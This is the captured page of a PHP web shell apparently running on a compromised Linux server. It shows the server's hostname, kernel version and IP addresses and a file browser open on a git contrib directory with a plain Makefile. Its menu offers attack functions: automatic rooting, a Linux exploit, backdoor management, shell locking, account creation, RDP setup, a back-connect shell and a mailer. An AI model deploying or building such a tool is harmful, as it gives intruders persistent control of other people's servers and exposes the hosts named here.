Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
git-1.8.3.1 /
contrib /
remote-helpers /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
291
B
-rw-r--r--
git-remote-bzr
25.48
KB
-rw-r--r--
git-remote-hg
25.1
KB
-rw-r--r--
test-bzr.sh
6.53
KB
-rw-r--r--
test-hg-bidi.sh
4.66
KB
-rw-r--r--
test-hg-hg-git.sh
10.21
KB
-rw-r--r--
test-hg.sh
3.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
TESTS := $(wildcard test*.sh) export T := $(addprefix $(CURDIR)/,$(TESTS)) export MAKE := $(MAKE) -e export PATH := $(CURDIR):$(PATH) export TEST_LINT := test-lint-executable test-lint-shell-syntax test: $(MAKE) -C ../../t $@ $(TESTS): $(MAKE) -C ../../t $(CURDIR)/$@ .PHONY: $(TESTS)
Close